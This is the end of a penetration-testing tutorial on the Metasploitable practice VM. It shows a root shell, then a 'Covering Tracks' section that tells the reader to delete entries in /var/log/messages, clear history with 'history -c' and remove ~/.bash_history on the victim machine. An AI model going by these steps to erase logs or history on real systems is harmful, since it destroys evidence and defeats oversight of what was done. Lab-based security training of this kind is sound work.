Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~# 

Covering Tracks

Clear Event Logs

Either using kwrite, edit, vi, etc, open the file /var/log/messages. From there you can delete any entries related to when you compromised the system or delete all the entries if you like.

Clearing terminal history

You can clear your current session’s bash history using the command history -c

You can also remove .bash_history file on the victim’s machine to remove all the history as well.

rm ~/.bash_history

Conclusion

Metasploitable provides us with common vulnerabilities and gives us a VM in which we can test some penetration techniques, however this is just a start to those interested in learning a bit about penetration testing. Later on I will exploit other vulnerable VMs located in Vulnhub and
Pentester Labs .

Note– I will continue to add more this guide with time. If you have any comments, questions, or any other topics you would want me to cover, let me know.